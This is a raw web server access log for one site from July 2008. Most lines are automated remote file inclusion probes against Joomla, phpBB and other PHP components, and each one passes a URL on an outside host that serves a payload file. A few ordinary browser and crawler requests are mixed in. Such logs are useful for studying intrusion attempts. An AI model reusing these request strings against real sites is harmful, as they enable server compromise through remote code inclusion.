78.157.129.6 - - [19/Jul/2008:09:00:19 -0700] "GET /logs/access_080117.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:09:00:20 -0700] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:09:00:21 -0700] "GET /logs//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.198.175.18 - - [19/Jul/2008:09:00:22 -0700] "GET /logs/access_080129.log/?mosConfig_absolute_path=http://www.grousetyee.com/jupload/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.198.175.18 - - [19/Jul/2008:09:00:23 -0700] "GET /logs/?mosConfig_absolute_path=http://www.grousetyee.com/jupload/README? HTTP/1.1" 200 56851 "-" "libwww-perl/5.808" "www.dmulk.com"
200.30.74.19 - - [19/Jul/2008:09:00:34 -0700] "GET /logs/access_080322.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.247.226.253 - - [19/Jul/2008:09:01:01 -0700] "GET /contenido.php?sec=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
213.59.235.4 - - [19/Jul/2008:09:01:11 -0700] "GET /logs/contenido.php?sec=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
213.59.235.4 - - [19/Jul/2008:09:01:11 -0700] "GET /contenido.php?sec=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
80.87.131.174 - - [19/Jul/2008:09:01:33 -0700] "GET /logs//Forums/admin/admin_users.php?phpbb_root_path=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.87.131.174 - - [19/Jul/2008:09:01:33 -0700] "GET //Forums/admin/admin_users.php?phpbb_root_path=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.119.244.16 - - [19/Jul/2008:09:01:46 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.16 - - [19/Jul/2008:09:01:46 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.200.206 - - [19/Jul/2008:09:02:18 -0700] "GET /logs//inc/download_center_lite.inc.php?script_root=http://www.handowire.com/bbs/Paddy/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.200.206 - - [19/Jul/2008:09:02:19 -0700] "GET //inc/download_center_lite.inc.php?script_root=http://www.handowire.com/bbs/Paddy/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:09:02:25 -0700] "GET /logs/access_080117.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:09:02:29 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:09:02:29 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:09:02:38 -0700] "GET /logs/access_080110.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.247.226.253 - - [19/Jul/2008:09:03:30 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
211.247.226.253 - - [19/Jul/2008:09:03:31 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
72.199.235.196 - - [19/Jul/2008:09:03:33 -0700] "GET /blog/wp-login.php HTTP/1.1" 200 1860 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
72.199.235.196 - - [19/Jul/2008:09:03:33 -0700] "GET /blog/wp-admin/css/login.css?version=2.5.1 HTTP/1.1" 200 1436 "http://dmulk.com/blog/wp-login.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
211.247.226.253 - - [19/Jul/2008:09:03:33 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 200 18403 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
72.199.235.196 - - [19/Jul/2008:09:03:33 -0700] "GET /blog/wp-admin/css/colors-fresh.css?version=2.5.1 HTTP/1.1" 200 13212 "http://dmulk.com/blog/wp-login.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
72.199.235.196 - - [19/Jul/2008:09:03:33 -0700] "GET /blog/wp-admin/images/logo-login.gif HTTP/1.1" 200 3184 "http://dmulk.com/blog/wp-admin/css/login.css?version=2.5.1" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
72.199.235.196 - - [19/Jul/2008:09:03:33 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
89.111.176.106 - - [19/Jul/2008:09:03:42 -0700] "GET /logs/access.log//plugins/safehtml/HTMLSax3.php?dir%5bplugins%5d%7dsafehtml=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:09:03:43 -0700] "GET //plugins/safehtml/HTMLSax3.php?dir%5bplugins%5d%7dsafehtml=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:09:03:43 -0700] "GET /logs//plugins/safehtml/HTMLSax3.php?dir%5bplugins%5d%7dsafehtml=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.80.225 - - [19/Jul/2008:09:04:16 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.80.225 - - [19/Jul/2008:09:04:16 -0700] "GET /logs/access.log%20//index.php?DOCUMENT_ROOT=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.80.225 - - [19/Jul/2008:09:04:19 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 200 18431 "-" "libwww-perl/5.805" "www.dmulk.com"
119.63.193.136 - - [19/Jul/2008:09:04:22 -0700] "GET /retreat1/webcam/ HTTP/1.1" 200 655228 "-" "Baiduspider+(+http://help.baidu.jp/system/05.html)" "www.dmulk.com"
66.196.41.226 - - [19/Jul/2008:09:04:23 -0700] "GET /logs/access_080225.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.193.201.57 - - [19/Jul/2008:09:04:42 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
216.193.201.57 - - [19/Jul/2008:09:04:42 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
69.64.80.225 - - [19/Jul/2008:09:05:02 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.143.162 - - [19/Jul/2008:09:05:42 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.keywordworkshop.com/attachments/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.143.162 - - [19/Jul/2008:09:05:42 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.keywordworkshop.com/attachments/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.143.162 - - [19/Jul/2008:09:06:25 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.keywordworkshop.com/attachments/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.143.162 - - [19/Jul/2008:09:06:25 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.keywordworkshop.com/attachments/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:09:06:26 -0700] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:09:06:27 -0700] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.143.233.40 - - [19/Jul/2008:09:06:43 -0700] "GET /logs/access_071225.log/?mosConfig_absolute_path=http://www.almacenes-si2.com/portal/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.143.233.40 - - [19/Jul/2008:09:06:45 -0700] "GET /logs/?mosConfig_absolute_path=http://www.almacenes-si2.com/portal/bajo.txt? HTTP/1.1" 200 56851 "-" "libwww-perl/5.79" "www.dmulk.com"
212.143.233.40 - - [19/Jul/2008:09:06:54 -0700] "GET /logs/access_071109.log/?mosConfig_absolute_path=http://www.almacenes-si2.com/portal/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.16 - - [19/Jul/2008:09:07:01 -0700] "GET /logs/access_080322.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:09:07:14 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.148.101.224 - - [19/Jul/2008:09:07:15 -0700] "GET /logs//inc/download_center_lite.inc.php?script_root=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:09:07:15 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.148.101.224 - - [19/Jul/2008:09:07:15 -0700] "GET //inc/download_center_lite.inc.php?script_root=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
121.97.51.4 - - [19/Jul/2008:09:07:18 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.97.51.4 - - [19/Jul/2008:09:07:18 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.110.54.240 - - [19/Jul/2008:09:07:37 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [19/Jul/2008:09:07:37 -0700] "GET /logs/access.log%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [19/Jul/2008:09:07:37 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [19/Jul/2008:09:07:38 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [19/Jul/2008:09:07:38 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [19/Jul/2008:09:07:38 -0700] "GET /logs/access.log%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.119.244.16 - - [19/Jul/2008:09:07:53 -0700] "GET /logs/access_080315.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.16 - - [19/Jul/2008:09:07:54 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.16 - - [19/Jul/2008:09:07:54 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.74.19 - - [19/Jul/2008:09:07:55 -0700] "GET /logs/home.php?inc=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.74.19 - - [19/Jul/2008:09:07:55 -0700] "GET /home.php?inc=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:09:08:03 -0700] "GET /logs/?mosConfig_absolute_path=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 200 56851 "-" "libwww-perl/5.803" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:09:08:08 -0700] "GET /?mosConfig_absolute_path=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 200 18413 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [19/Jul/2008:09:08:16 -0700] "GET /logs/access_080329.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [19/Jul/2008:09:08:16 -0700] "GET /logs/access_080329.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [19/Jul/2008:09:08:18 -0700] "GET /logs/access.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.119.244.16 - - [19/Jul/2008:09:08:19 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.16 - - [19/Jul/2008:09:08:20 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.16 - - [19/Jul/2008:09:08:21 -0700] "GET /logs/access_080225.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.13.194.38 - - [19/Jul/2008:09:08:23 -0700] "GET /logs/config.php?path_to_root=http://www.blackstock.ca/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.13.194.38 - - [19/Jul/2008:09:08:23 -0700] "GET /config.php?path_to_root=http://www.blackstock.ca/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
121.97.51.4 - - [19/Jul/2008:09:08:34 -0700] "GET //components/errors.php?error=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.30.74.19 - - [19/Jul/2008:09:08:43 -0700] "GET /logs/home.php?inc=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.74.19 - - [19/Jul/2008:09:08:44 -0700] "GET /home.php?inc=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.198.5.87 - - [19/Jul/2008:09:08:47 -0700] "GET /logs/config.php?path_to_root=http://www.blackstock.ca/alb?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.5.87 - - [19/Jul/2008:09:08:49 -0700] "GET /config.php?path_to_root=http://www.blackstock.ca/alb?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
217.110.54.240 - - [19/Jul/2008:09:08:55 -0700] "GET /logs/access.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.210.115.114 - - [19/Jul/2008:09:09:10 -0700] "GET /logs/access.log/index.php?pg=http://psyop.com.au/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.210.115.114 - - [19/Jul/2008:09:09:11 -0700] "GET /index.php?pg=http://psyop.com.au/echo.txt?? HTTP/1.1" 200 18359 "-" "libwww-perl/5.812" "www.dmulk.com"
207.210.115.114 - - [19/Jul/2008:09:09:11 -0700] "GET /logs/index.php?pg=http://psyop.com.au/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
77.221.130.15 - - [19/Jul/2008:09:09:16 -0700] "GET /logs//inc/download_center_lite.inc.php?script_root=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [19/Jul/2008:09:09:17 -0700] "GET //inc/download_center_lite.inc.php?script_root=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.51.130.220 - - [19/Jul/2008:09:09:38 -0700] "GET /logs/access_080117.log//login.php?dir=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.51.130.220 - - [19/Jul/2008:09:09:48 -0700] "GET /logs/access_080128.log//login.php?dir=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.37.125 - - [19/Jul/2008:09:10:08 -0700] "GET /blog/index.php/2008/04/03/hello-world/trackback/ HTTP/1.0" 200 6895 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
72.29.87.80 - - [19/Jul/2008:09:10:22 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=[BiTcH]?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.200.206 - - [19/Jul/2008:09:11:04 -0700] "GET /logs//inc/download_center_lite.inc.php?script_root=http://www.handowire.com/bbs/Paddy/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.200.206 - - [19/Jul/2008:09:11:04 -0700] "GET //inc/download_center_lite.inc.php?script_root=http://www.handowire.com/bbs/Paddy/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.37.125 - - [19/Jul/2008:09:11:08 -0700] "GET /blog/index.php/2008/04/03/hello-world/trackback/ HTTP/1.0" 200 6895 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.37.125 - - [19/Jul/2008:09:11:08 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://dmulk.com/blog/2008/04/03/hello-world/trackback/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.37.125 - - [19/Jul/2008:09:11:08 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://dmulk.com/blog/2008/04/03/hello-world/trackback/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.37.125 - - [19/Jul/2008:09:11:08 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://dmulk.com/blog/2008/04/03/hello-world/trackback/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
77.221.130.15 - - [19/Jul/2008:09:11:10 -0700] "GET /logs//inc/download_center_lite.inc.php?script_root=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [19/Jul/2008:09:11:11 -0700] "GET //inc/download_center_lite.inc.php?script_root=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.11.233.78 - - [19/Jul/2008:09:11:13 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.11.233.78 - - [19/Jul/2008:09:11:15 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 200 18413 "-" "libwww-perl/5.810" "www.dmulk.com"
121.97.51.4 - - [19/Jul/2008:09:11:29 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.97.51.4 - - [19/Jul/2008:09:11:30 -0700] "GET //include/lib.inc.php?site_path=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [19/Jul/2008:09:11:32 -0700] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.keywordworkshop.com/attachments/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:09:11:35 -0700] "GET /logs/access_080418.log//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:09:11:35 -0700] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
121.97.51.4 - - [19/Jul/2008:09:11:35 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:09:11:35 -0700] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.119.244.16 - - [19/Jul/2008:09:11:48 -0700] "GET /logs/access_080225.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.87.131.174 - - [19/Jul/2008:09:11:51 -0700] "GET /logs//Forums/admin/admin_users.php?phpbb_root_path=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.87.131.174 - - [19/Jul/2008:09:11:52 -0700] "GET //Forums/admin/admin_users.php?phpbb_root_path=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.198.175.18 - - [19/Jul/2008:09:11:58 -0700] "GET /logs//cart_content.php?cart_isp_root=http://www.grousetyee.com/jupload/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.198.175.18 - - [19/Jul/2008:09:11:59 -0700] "GET //cart_content.php?cart_isp_root=http://www.grousetyee.com/jupload/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.233.78 - - [19/Jul/2008:09:12:03 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.11.233.78 - - [19/Jul/2008:09:12:05 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 200 18413 "-" "libwww-perl/5.810" "www.dmulk.com"
85.119.244.16 - - [19/Jul/2008:09:12:06 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
